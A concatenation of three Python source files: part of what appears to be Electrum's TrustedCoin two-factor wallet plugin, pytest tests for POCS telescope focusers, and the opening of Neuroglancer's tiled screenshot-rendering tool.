self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
test_focuser.py
|
import time
import pytest
from threading import Thread
from pocs.focuser.simulator import Focuser as SimFocuser
from pocs.focuser.birger import Focuser as BirgerFocuser
from pocs.focuser.focuslynx import Focuser as FocusLynxFocuser
from pocs.camera.simulator import Camera
from pocs.utils.config import load_config
params = [SimFocuser, BirgerFocuser, FocusLynxFocuser]
ids = ['simulator', 'birger', 'focuslynx']
# Ugly hack to access id inside fixture
@pytest.fixture(scope='module', params=zip(params, ids), ids=ids)
def focuser(request):
if request.param[0] == SimFocuser:
# Simulated focuser, just create one and return it
return request.param[0]()
else:
# Load the local config file and look for focuser configurations of the specified type
focuser_configs = []
local_config = load_config('pocs_local', ignore_local=True)
camera_info = local_config.get('cameras')
if camera_info:
# Local config file has a cameras section
camera_configs = camera_info.get('devices')
if camera_configs:
# Local config file camera section has a devices list
for camera_config in camera_configs:
if camera_config:
focuser_config = camera_config.get('focuser', None)
if focuser_config and focuser_config['model'] == request.param[1]:
# Camera config has a focuser section, and it's the right type
focuser_configs.append(focuser_config)
if not focuser_configs:
pytest.skip(
"Found no {} configurations in pocs_local.yaml, skipping tests".format(
request.param[1]))
# Create and return a Focuser based on the first config
return request.param[0](**focuser_configs[0])
@pytest.fixture(scope='module')
def tolerance(focuser):
"""
Tolerance for confirming focuser has moved to the requested position. The Birger may be
1 or 2 encoder steps off.
"""
if isinstance(focuser, SimFocuser):
return 0
elif isinstance(focuser, BirgerFocuser):
return 2
elif isinstance(focuser, FocusLynxFocuser):
return 0
def test_init(focuser):
"""
Confirm proper init & exercise some of the property getters
"""
assert focuser.is_connected
# Expect UID to be a string (or integer?) of non-zero length? Just assert its True
assert focuser.uid
def test_move_to(focuser, tolerance):
focuser.move_to(100)
assert focuser.position == pytest.approx(100, abs=tolerance)
def test_move_by(focuser, tolerance):
focuser.move_to(100)
previous_position = focuser.position
increment = -13
focuser.move_by(increment)
assert focuser.position == pytest.approx((previous_position + increment), abs=tolerance)
def test_is_ready(focuser):
move_thread = Thread(target=focuser.move_by, args=[13])
assert not focuser.is_moving
assert focuser.is_ready
move_thread.start()
time.sleep(0.01)
assert focuser.is_moving
assert not focuser.is_ready
move_thread.join()
assert not focuser.is_moving
assert focuser.is_ready
def test_position_setter(focuser, tolerance):
"""
Can assign to position property as an alternative to move_to() method
"""
focuser.position = 75
assert focuser.position == pytest.approx(75, abs=tolerance)
def test_move_below_min_position(focuser, tolerance):
focuser.move_to(focuser.min_position - 100)
assert focuser.position == pytest.approx(focuser.min_position, tolerance)
def test_move_above_max_positons(focuser, tolerance):
focuser.move_to(focuser.max_position + 100)
assert focuser.position == pytest.approx(focuser.max_position, tolerance)
def test_camera_association(focuser):
"""
Test association of Focuser with Camera after initialisation (getter, setter)
"""
sim_camera_1 = Camera()
sim_camera_2 = Camera()
# Cameras in the fixture haven't been associated with a Camera yet, this should work
focuser.camera = sim_camera_1
assert focuser.camera is sim_camera_1
# Attempting to associate with a second Camera should fail, though.
focuser.camera = sim_camera_2
assert focuser.camera is sim_camera_1
def test_camera_init():
"""
Test focuser init via Camera constructor/
"""
sim_camera = Camera(focuser={'model': 'simulator', 'focus_port': '/dev/ttyFAKE'})
assert isinstance(sim_camera.focuser, SimFocuser)
assert sim_camera.focuser.is_connected
assert sim_camera.focuser.uid
assert sim_camera.focuser.camera is sim_camera
def test_camera_association_on_init():
"""
Test association of Focuser with Camera during Focuser init
"""
sim_camera = Camera()
focuser = SimFocuser(camera=sim_camera)
assert focuser.camera is sim_camera
|
screenshot.py
|
#!/usr/bin/env python
# @license
# Copyright 2020 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for creating screenshots with Neuroglancer.
The Neuroglancer state may be specified either by a URL or by a path to a JSON
state file.
Rendering requires a web browser. By default, a headless chromedriver is
started in the background. It is also possible to use non-headless chromedriver
or a manually-opened browser.
There are several methods by which the screenshot image may be rendered:
1. The state can be rendered directly as a single frame by Neuroglancer. This
is the simplest and fastest method and works for most states.
2. If the output image size exceeds what Neuroglancer/the browser can support
(usually about 4096x4096), tiled rendering can be used. In this case,
Neuroglancer will render the image as multiple tiles which are assembled
automatically into a single image. This is enabled automatically if the
requested image size exceeds the specified tile dimensions. All normal
functionality is supported, except for the "show_slices" option whereby
cross-section panels are also shown in the 3-d view. Manually-specified
cross sections via the "cross_sections" property are supported, however.
3. If a very large number of 3-d objects are to be rendered, it may be
impossible for Neuroglancer to render them all simultaneously due to memory
limits. The `--segment-shard-size` option may be specified to enable a
special rendering mode in which subsets of the objects are rendered
independently and then combined together into a single image. Depth
information is used to combine the images together. Currently, transparent
rendering of objects is not supported, though. As the final image is
produced incrementally, the state is saved in a `.npz` file, which allows
resuming if the screenshot process is interrupted. To avoid resuming if you
change options, delete the `.npz` file.
Tips:
- The Neuroglancer UI controls are not shown, and in the case of multi-panel
layouts, there is no border between panels. In most cases it is desirable to
capture a single-panel layout.
- The layer side panel and statistics panel, if open, will be closed for the
screenshot.
- The specified image dimensions will be used, rather than the dimensions of
your browser window. This, in combination with the removal of the normal
Neuroglancer UI controls, means that the field of view may differ somewhat.
- The axis lines and volume bounding boxes will be shown if they are enabled in
the Neuroglancer state. If you don't want them in the screenshot, you should
disable them in the Neuroglancer state. You may also use the
`--hide-axis-lines` and `--hide-default-annotations` options. In most cases
it is desirable to hide the axis lines and default annotations.
- The scale bars will be shown if they are enabled in the Neuroglancer state.
If you specify a large image size, you may want to increase the size of the
scale bar, using the `--scale-bar-scale` option.
"""
import argparse
import collections
import contextlib
import copy
import datetime
import itertools
import numbers
import os
import threading
import time
from typing import NamedTuple, Tuple, Callable, Iterator, List, Optional
import PIL
import numpy as np
import neuroglancer
import neuroglancer.cli
import neuroglancer.webdriver
def _get_total_segments(state):
num_segments = 0
for layer in state.layers:
if not isinstance(layer.layer, neuroglancer.SegmentationLayer):
continue
num_segments += len(layer.segments)
return num_segments
def _should_shard_segments(state, segment_shard_size):
return _get_total_segments(state) > segment_shard_size
def _calculate_num_shards(state, segment_shard_size):
total_segments = _get_total_segments(state)
return -(-total_segments // segment_shard_size)
def _get_sharded_states(state, segment_shard_size, reverse_bits):
if reverse_bits:
sort_key = lambda x: int('{:064b}'.format(x)[::-1], 2)
else:
sort_key = None
num_shards = _calculate_num_shards(state, segment_shard_size)
for shard_i in range(num_shards):
new_state = copy.deepcopy(state)
cum_retained = 0
cum_skipped = segment_shard_size * shard_i
for i, layer in enumerate(new_state.layers):
if not isinstance(layer.layer, neuroglancer.SegmentationLayer):
continue
segments = sorted(layer.segments, key=sort_key)
num_to_skip = min(cum_skipped, len(segments))
segments = segments[num_to_skip:]
cum_skipped += num_to_skip
num_to_retain = min(segment_shard_size - cum_retained, len(segments))
cum_retained += num_to_retain
layer.segments = set(segments[:num_to_retain])
yield new_state
class TileGenerator:
def __init__(self, shape, tile_shape):
self.tile_shape = tuple(tile_shape)
self.shape = tuple(shape)
self.tile_grid_shape = tuple(-(-self.shape[i] // self.tile_shape[i]) for i in range(2))
self.tile_shape = tuple(-(-self.shape[i] // self.tile_grid_shape[i]) for i in range(2))
self.num_tiles = self.tile_grid_shape[0] * self.tile_grid_shape[1]
def get_tile_states(self, state):
for tile_y in range(self.tile_grid_shape[1]):
for tile_x in range(self.tile_grid_shape[0]):
x_offset = tile_x * self.tile_shape[0]
y_offset = tile_y * self.tile_shape[1]
tile_width = min(self.tile_shape[0], self.shape[0] - x_offset)
tile_height = min(self.tile_shape[1], self.shape[1] - y_offset)
new_state = copy.deepcopy(state)
new_state.partial_viewport = [
x_offset / self.shape[0], y_offset / self.shape[1], tile_width / self.shape[0],
tile_height / self.shape[1]
]
params = {
'tile_x': tile_x,
'tile_y': tile_y,
'x_offset': x_offset,
'y_offset': y_offset,
'tile_width': tile_width,
'tile_height': tile_height,
}
yield params, new_state
class ShardedTileGenerator(TileGenerator):
def __init__(self, state, segment_shard_size, reverse_bits, **kwargs):
super(ShardedTileGenerator, self).__init__(**kwargs)
self.state = state
self.reverse_bits = reverse_bits
self.total_segments = _get_total_segments(self.state)
self.segment_shard_size = segment_shard_size
self.num_shards = _calculate_num_shards(self.state, self.segment_shard_size)
self.num_tiles *= self.num_shards
def get_states(self):
for shard_i, state in enumerate(
_get_sharded_states(self.state,
self.segment_shard_size,
reverse_bits=self.reverse_bits)):
for params, state in self.get_tile_states(state):
params['segment_shard'] = shard_i
yield params, state
class CaptureScreenshotRequest(NamedTuple):
state: neuroglancer.ViewerState
description: str
config_callback: Callable[[neuroglancer.viewer_config_state.ConfigState], None]
response_callback: neuroglancer.viewer_config_state.ScreenshotReply
include_depth: bool = False
def buffered_iterator(base_iter, lock, buffer_size):
while True:
with lock:
buffered_items = list(itertools.islice(base_iter, buffer_size))
if not buffered_items: break
for item in buffered_items:
yield item
def capture_screenshots(viewer: neuroglancer.Viewer,
request_iter: Iterator[CaptureScreenshotRequest],
refresh_browser_callback: Callable[[], None],
refresh_browser_timeout: int,
num_to_prefetch: int = 1) -> None:
prefetch_buffer = list(itertools.islice(request_iter, num_to_prefetch + 1))
while prefetch_buffer:
with viewer.config_state.txn() as s:
s.show_ui_controls = False
s.show_panel_borders = False
del s.prefetch[:]
for i, request in enumerate(prefetch_buffer[1:]):
s.prefetch.append(
neuroglancer.PrefetchState(state=request.state, priority=num_to_prefetch - i))
request = prefetch_buffer[0]
request.config_callback(s)
viewer.set_state(request.state)
print('%s [%s] Requesting screenshot' % (
datetime.datetime.now().strftime('%Y-%m-%dT%H:%M%S.%f'),
request.description,
))
last_statistics_time = time.time()
def statistics_callback(statistics):
nonlocal last_statistics_time
last_statistics_time = time.time()
total = statistics.total
print(
'%s [%s] Screenshot in progress: %6d/%6d chunks loaded (%10d bytes), %3d downloading'
% (
datetime.datetime.now().strftime('%Y-%m-%dT%H:%M%S.%f'),
request.description,
total.visible_chunks_gpu_memory,
total.visible_chunks_total,
total.visible_gpu_memory,
total.visible_chunks_downloading,
))
event = threading.Event()
screenshot = None
def result_callback(s):
nonlocal screenshot
screenshot = s.screenshot
event.set()
viewer.async_screenshot(
result_callback,
include_depth=request.include_depth,
statistics_callback=statistics_callback,
)
def get_timeout():
return max(0, last_statistics_time + refresh_browser_timeout - time.time())
while True:
if event.wait(get_timeout()):
break
if get_timeout() > 0:
continue
last_statistics_time = time.time()
refresh_browser_callback()
request.response_callback(screenshot)
del prefetch_buffer[0]
next_request = next(request_iter, None)
if next_request is not None:
prefetch_buffer.append(next_request)
def capture_screenshots_in_parallel(viewers: List[Tuple[neuroglancer.Viewer, Callable[[], None]]],
request_iter: Iterator[CaptureScreenshotRequest],
refresh_browser_timeout: numbers.Number, num_to_prefetch: int,
total_requests: Optional[int] = None,
buffer_size: Optional[int] = None):
if buffer_size is None:
if total_requests is None:
copy_of_requests = list(request_iter)
total_requests = len(copy_of_requests)
request_iter = iter(copy_of_requests)
buffer_size = max(1, total_requests // (len(viewers) * 4))
request_iter = iter(request_iter)
threads = []
buffer_lock = threading.Lock()
for viewer, refresh_browser_callback in viewers:
def capture_func(viewer, refresh_browser_callback):
viewer_request_iter = buffered_iterator(base_iter=request_iter,
lock=buffer_lock,
buffer_size=buffer_size)
capture_screenshots(
viewer=viewer,
request_iter=viewer_request_iter,
num_to_prefetch=num_to_prefetch,
refresh_browser_timeout=refresh_browser_timeout,
refresh_browser_callback=refresh_browser_callback,
)
t = threading.Thread(target=capture_func, args=(viewer, refresh_browser_callback))
t.start()
threads.append(t)
for t in threads:
t.join()
class MultiCapturer:
def __init__(self,
shape,
include_depth,
output,
config_callback,
num_to_prefetch,
checkpoint_interval=60):
self.include_depth = include_depth
self.checkpoint_interval = checkpoint_interval
self.config_callback = config_callback
self.num_to_prefetch = num_to_prefetch
self.output = output
self._processed = set()
self.state_file = output + '.npz'
self.temp_state_file = self.state_file + '.tmp'
self.image_array = np.zeros((shape[1], shape[0], 4), dtype=np.uint8)
if self.include_depth:
self.depth_array = np.zeros((shape[1], shape[0]), dtype=np.float32)
self._load_state()
self._add_image_lock = threading.Lock()
self._last_save_time = time.time()
self._save_state_in_progress = threading.Event()
self._save_state_in_progress.set()
self._num_states_processed = 0
self._start_time = time.time()
def _load_state(self):
if not os.path.exists(self.state_file):
return
with np.load(self.state_file, allow_pickle=True) as f:
if self.include_depth:
self.depth_array = f['depth']
self.image_array = f['image']
self._processed = set(f['processed'].ravel()[0])
def _save_state(self, save_image=False):
with self._add_image_lock:
processed = set(self._processed)
with open(self.temp_state_file, 'wb') as f:
save_arrays = {
'image': self.image_array,
'processed': processed,
}
if self.include_depth:
save_arrays['depth'] = self.depth_array
np.savez_compressed(f, **save_arrays)
os.replace(self.temp_state_file, self.state_file)
if save_image:
self._save_image()
def _save_state_async(self, save_image=False):
print('Starting checkpointing')
def func():
try:
self._save_state()
print('Done checkpointing')
finally:
self._save_state_in_progress.set()
threading.Thread(target=func, daemon=True).start()
def _save_image(self):
im = PIL.Image.fromarray(self.image_array)
im.save(self.output)
def _add_image(self, params, screenshot):
with self._add_image_lock:
tile_image = screenshot.image_pixels
tile_selector = np.s_[params['y_offset']:params['y_offset'] + params['tile_height'],
params['x_offset']:params['x_offset'] + params['tile_width']]
if self.include_depth:
tile_depth = screenshot.depth_array
depth_array_part = self.depth_array[tile_selector]
mask = np.logical_and(np.logical_or(tile_depth != 0, depth_array_part == 0),
tile_depth >= depth_array_part)
depth_array_part[mask] = tile_depth[mask]
else:
mask = Ellipsis
self.image_array[tile_selector][mask] = tile_image[mask]
self._processed.add(self._get_description(params))
self._num_states_processed += 1
elapsed = time.time() - self._start_time
print('%4d tiles rendered in %5d seconds: %.1f seconds/tile' %
(self._num_states_processed, elapsed, elapsed / self._num_states_processed))
def _maybe_save_state(self):
if not self._save_state_in_progress.is_set(): return
with self._add_image_lock:
if self._last_save_time + self.checkpoint_interval < time.time():
self._last_save_time = time.time()
self._save_state_in_progress.clear()
self._save_state_async(save_image=False)
def _get_description(self, params):
segment_shard = params.get('segment_shard')
if segment_shard is not None:
prefix = 'segment_shard=%d ' % (segment_shard, )
else:
prefix = ''
return '%stile_x=%d tile_y=%d' % (prefix, params['tile_x'], params['tile_y'])
def _make_capture_request(self, params, state):
description = self._get_description(params)
if description in self._processed: return None
def config_callback(s):
s.viewer_size = (params['tile_width'], params['tile_height'])
self.config_callback(s)
def response_callback(screenshot):
self._add_image(params, screenshot)
self._maybe_save_state()
return CaptureScreenshotRequest(state=state,
description=self._get_description(params),
config_callback=config_callback,
response_callback=response_callback,
include_depth=self.include_depth)
def _get_capture_screenshot_request_iter(self, state_iter):
for params, state in state_iter:
request = self._make_capture_request(params, state)
if request is not None: yield request
def capture(self, viewers, state_iter, refresh_browser_timeout: int, save_depth: bool, total_requests: int):
capture_screenshots_in_parallel(
viewers=viewers,
request_iter=self._get_capture_screenshot_request_iter(state_iter),
refresh_browser_timeout=refresh_browser_timeout,
num_to_prefetch=self.num_to_prefetch,
total_requests=total_requests)
if not self._save_state_in_progress.is_set():
print('Waiting for previous save state to complete')
self._save_state_in_progress.wait()
if save_depth:
self._save_state()
else:
self._save_image()
if os.path.exists(self.state_file):
os.remove(self.state_file)
def capture_image(viewers, args, state):
def config_callback(s):
s.scale_bar_options.scale_factor = args.scale_bar_scale
segment_shard_size = args.segment_shard_size
tile_parameters = dict(
shape=(args.width, args.height),
tile_shape=(args.tile_width, args.tile_height),
)
if segment_shard_size is not None and _should_shard_segments(state, segment_shard_size):
gen = ShardedTileGenerator(state=state,
segment_shard_size=segment_shard_size,
reverse_bits=args.sort_segments_by_reversed_bits,
**tile_parameters)
num_states = gen.num_tiles
state_iter = gen.get_states()
include_depth = True
else:
gen = TileGenerator(**tile_parameters)
num_states = gen.num_tiles
state_iter = gen.get_tile_states(state)
include_depth = False
capturer = MultiCapturer(
shape=tile_parameters['shape'],
include_depth=include_depth,
output=args.output,
config_callback=config_callback,
num_to_prefetch=args.prefetch,
checkpoint_interval=args.checkpoint_interval,
)
num_output_shards = args.num_output_shards
tiles_per_output_shard = args.tiles_per_output_shard
output_shard = args.output_shard
if (output_shard is None) != (num_output_shards is None and tiles_per_output_shard is None):
raise ValueError(
'--output-shard must be specified in combination with --num-output-shards or --tiles-per-output-shard'
)
if output_shard is not None:
if num_output_shards is not None:
if num_output_shards < 1:
raise ValueError('Invalid --num-output-shards: %d' % (num_output_shards, ))
states_per_shard = -(-num_states // num_output_shards)
else:
if tiles_per_output_shard < 1:
raise ValueError('Invalid --tiles-per-output-shard: %d' %
(tiles_per_output_shard, ))
num_output_shards = -(-num_states // tiles_per_output_shard)
states_per_shard = tiles_per_output_shard
if output_shard < 0 or output_shard >= num_output_shards:
raise ValueError('Invalid --output-shard: %d' % (output_shard, ))
print('Total states: %d, Number of output shards: %d' % (num_states, num_output_shards))
state_iter = itertools.islice(state_iter, states_per_shard * output_shard,
states_per_shard * (output_shard + 1))
else:
states_per_shard = num_states
capturer.capture(
viewers=viewers,
state_iter=state_iter,
refresh_browser_timeout=args.refresh_browser_timeout,
save_depth=output_shard is not None,
total_requests=states_per_shard,
)
def define_state_modification_args(ap: argparse.ArgumentParser):
ap.add_argument('--hide-axis-lines',
dest='show_axis_lines',
action='store_false',
help='Override showAxisLines setting in state.')
ap.add_argument('--hide-default-annotations',
action='store_false',
dest='show_default_annotations',
help='Override showDefaultAnnotations setting in state.')
ap.add_argument('--projection-scale-multiplier',
type=float,
help='Multiply projection view scale by specified factor.')
ap.add_argument('--system-memory-limit',
type=int,
default=3 * 1024 * 1024 * 1024,
help='System memory limit')
ap.add_argument('--gpu-memory-limit',
type=int,
default=3 * 1024 * 1024 * 1024,
help='GPU memory limit')
